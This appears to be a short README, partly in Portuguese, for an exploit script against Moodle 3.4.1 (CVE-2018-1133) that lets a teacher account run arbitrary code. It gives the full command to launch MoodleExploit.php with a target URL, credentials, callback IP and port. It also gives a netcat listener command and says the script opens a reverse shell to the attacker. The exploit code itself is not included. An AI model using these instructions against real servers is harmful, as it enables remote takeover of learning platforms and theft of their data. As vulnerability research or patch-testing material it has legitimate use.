
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
Um usuário com o papel de professor é capaz de executar código arbitrário.
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user The account username
pass The password to the account
ip Callback IP
port Callback Port
course Valid course ID belonging to the teacher
Certifique-se de estar executando um listener netcat na porta especificada antes de executar este script.
nc -lnvp 1010
Isso tentará abrir um shell reverso para o IP e porta do listener.
Este exploit é baseado em informações fornecidas por Robin Peraglie.
Leitura adicional: